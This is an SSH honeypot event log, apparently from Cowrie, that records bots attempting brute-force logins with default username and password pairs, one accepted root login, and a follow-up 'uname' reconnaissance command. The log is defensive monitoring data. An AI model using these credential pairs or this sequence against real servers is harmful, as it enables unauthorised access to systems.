{"eventid":"cowrie.session.closed","duration":"5.1","message":"Connection lost after 5.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:04:27.749045Z","src_ip":"45.88.8.186","session":"cfb8f74d642e"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":52208,"dst_ip":"1.2.3.4","dst_port":22,"session":"d013dfe61825","protocol":"ssh","message":"New connection: 83.168.105.65:52208 (1.2.3.4:22) [session: d013dfe61825]","sensor":"my-vps","timestamp":"2025-08-26T12:04:31.228712Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:04:31.229449Z","src_ip":"83.168.105.65","session":"d013dfe61825"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:04:31.270702Z","src_ip":"83.168.105.65","session":"d013dfe61825"}
{"eventid":"cowrie.login.failed","username":"app","password":"123456","message":"login attempt [app/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T12:04:31.394027Z","src_ip":"83.168.105.65","session":"d013dfe61825"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:04:32.436199Z","src_ip":"83.168.105.65","session":"d013dfe61825"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":53766,"dst_ip":"1.2.3.4","dst_port":22,"session":"91b063b953cd","protocol":"ssh","message":"New connection: 83.168.105.65:53766 (1.2.3.4:22) [session: 91b063b953cd]","sensor":"my-vps","timestamp":"2025-08-26T12:04:46.667925Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:04:46.668984Z","src_ip":"83.168.105.65","session":"91b063b953cd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:04:46.705283Z","src_ip":"83.168.105.65","session":"91b063b953cd"}
{"eventid":"cowrie.login.success","username":"root","password":"Password","message":"login attempt [root/Password] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:04:46.817462Z","src_ip":"83.168.105.65","session":"91b063b953cd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:04:46.950152Z","src_ip":"83.168.105.65","session":"91b063b953cd"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T12:04:46.950926Z","src_ip":"83.168.105.65","session":"91b063b953cd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34394,"dst_ip":"1.2.3.4","dst_port":22,"session":"0f8db56dd14d","protocol":"ssh","message":"New connection: 212.227.235.229:34394 (1.2.3.4:22) [session: 0f8db56dd14d]","sensor":"my-vps","timestamp":"2025-08-26T12:04:46.952290Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:04:46.988009Z","src_ip":"83.168.105.65","session":"91b063b953cd"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:04:46.989221Z","src_ip":"83.168.105.65","session":"91b063b953cd"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:04:47.014132Z","src_ip":"212.227.235.229","session":"0f8db56dd14d"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T12:04:47.114474Z","src_ip":"212.227.235.229","session":"0f8db56dd14d"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123456","message":"login attempt [admin/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T12:04:48.788974Z","src_ip":"212.227.235.229","session":"0f8db56dd14d"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:04:50.144122Z","src_ip":"212.227.235.229","session":"0f8db56dd14d"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":38724,"dst_ip":"1.2.3.4","dst_port":22,"session":"035bfe3e28a9","protocol":"ssh","message":"New connection: 196.251.86.249:38724 (1.2.3.4:22) [session: 035bfe3e28a9]","sensor":"my-vps","timestamp":"2025-08-26T12:04:59.997166Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:05:00.572044Z","src_ip":"196.251.86.249","session":"035bfe3e28a9"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T12:05:00.572763Z","src_ip":"196.251.86.249","session":"035bfe3e28a9"}
{"eventid":"cowrie.login.failed","username":"git","password":"1q2w3e","message":"login attempt [git/1q2w3e] failed","sensor":"my-vps","timestamp":"2025-08-26T12:05:02.149028Z","src_ip":"196.251.86.249","session":"035bfe3e28a9"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":47852,"dst_ip":"1.2.3.4","dst_port":22,"session":"b523e5d97064","protocol":"ssh","message":"New connection: 83.168.105.65:47852 (1.2.3.4:22) [session: b523e5d97064]","sensor":"my-vps","timestamp":"2025-08-26T12:05:02.229449Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:05:02.231789Z","src_ip":"83.168.105.65","session":"b523e5d97064"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:05:02.272488Z","src_ip":"83.168.105.65","session":"b523e5d97064"}
{"eventid":"cowrie.login.failed","username":"www","password":"123456","message":"login attempt [www/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T12:05:02.397112Z","src_ip":"83.168.105.65","session":"b523e5d97064"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:05:03.439483Z","src_ip":"83.168.105.65","session":"b523e5d97064"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:05:03.692055Z","src_ip":"196.251.86.249","session":"035bfe3e28a9"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":39716,"dst_ip":"1.2.3.4","dst_port":22,"session":"7b9256f8bd57","protocol":"ssh","message":"New connection: 83.168.105.65:39716 (1.2.3.4:22) [session: 7b9256f8bd57]","sensor":"my-vps","timestamp":"2025-08-26T12:05:17.891247Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:05:17.892054Z","src_ip":"83.168.105.65","session":"7b9256f8bd57"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:05:17.934801Z","src_ip":"83.168.105.65","session":"7b9256f8bd57"}
{"eventid":"cowrie.login.failed","username":"sonar","password":"sonar","message":"login attempt [sonar/sonar] failed","sensor":"my-vps","timestamp":"2025-08-26T12:05:18.057652Z","src_ip":"83.168.105.65","session":"7b9256f8bd57"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:05:19.100123Z","src_ip":"83.168.105.65","session":"7b9256f8bd57"}
{"eventid":"cowrie.session.connect","src_ip":"118.191.0.204","src_port":34492,"dst_ip":"1.2.3.4","dst_port":22,"session":"9c9f70ddcd37","protocol":"ssh","message":"New connection: 118.191.0.204:34492 (1.2.3.4:22) [session: 9c9f70ddcd37]","sensor":"my-vps","timestamp":"2025-08-26T12:05:24.265609Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T12:05:24.266469Z","src_ip":"118.191.0.204","session":"9c9f70ddcd37"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53744,"dst_ip":"1.2.3.4","dst_port":22,"session":"3d6f607f5dd1","protocol":"ssh","message":"New connection: 212.227.235.229:53744 (1.2.3.4:22) [session: 3d6f607f5dd1]","sensor":"my-vps","timestamp":"2025-08-26T12:05:24.300843Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:05:24.721141Z","src_ip":"212.227.235.229","session":"3d6f607f5dd1"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T12:05:24.721831Z","src_ip":"212.227.235.229","session":"3d6f607f5dd1"}
{"eventid":"cowrie.login.failed","username":"admin","password":"password","message":"login attempt [admin/password] failed","sensor":"my-vps","timestamp":"2025-08-26T12:05:25.872705Z","src_ip":"212.227.235.229","session":"3d6f607f5dd1"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:05:27.215987Z","src_ip":"212.227.235.229","session":"3d6f607f5dd1"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":51010,"dst_ip":"1.2.3.4","dst_port":22,"session":"1d891054510f","protocol":"ssh","message":"New connection: 83.168.105.65:51010 (1.2.3.4:22) [session: 1d891054510f]","sensor":"my-vps","timestamp":"2025-08-26T12:05:33.436758Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:05:33.437495Z","src_ip":"83.168.105.65","session":"1d891054510f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:05:33.474376Z","src_ip":"83.168.105.65","session":"1d891054510f"}
{"eventid":"cowrie.login.failed","username":"elasticsearch","password":"elasticsearch","message":"login attempt [elasticsearch/elasticsearch] failed","sensor":"my-vps","timestamp":"2025-08-26T12:05:33.587575Z","src_ip":"83.168.105.65","session":"1d891054510f"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:05:34.626220Z","src_ip":"83.168.105.65","session":"1d891054510f"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":36398,"dst_ip":"1.2.3.4","dst_port":22,"session":"11ef2febabc3","protocol":"ssh","message":"New connection: 83.168.105.65:36398 (1.2.3.4:22) [session: 11ef2febabc3]","sensor":"my-vps","timestamp":"2025-08-26T12:05:49.022142Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:05:49.022886Z","src_ip":"83.168.105.65","session":"11ef2febabc3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:05:49.059314Z","src_ip":"83.168.105.65","session":"11ef2febabc3"}
{"eventid":"cowrie.login.failed","username":"docker","password":"docker123","message":"login attempt [docker/docker123] failed","sensor":"my-vps","timestamp":"2025-08-26T12:05:49.169280Z","src_ip":"83.168.105.65","session":"11ef2febabc3"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:05:50.207804Z","src_ip":"83.168.105.65","session":"11ef2febabc3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44126,"dst_ip":"1.2.3.4","dst_port":22,"session":"9a3109f780ff","protocol":"ssh","message":"New connection: 212.227.235.229:44126 (1.2.3.4:22) [session: 9a3109f780ff]","sensor":"my-vps","timestamp":"2025-08-26T12:06:00.622970Z"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":38710,"dst_ip":"1.2.3.4","dst_port":22,"session":"0550ec00cecc","protocol":"ssh","message":"New connection: 196.251.86.249:38710 (1.2.3.4:22) [session: 0550ec00cecc]","sensor":"my-vps","timestamp":"2025-08-26T12:06:00.790090Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:06:01.042888Z","src_ip":"212.227.235.229","session":"9a3109f780ff"}
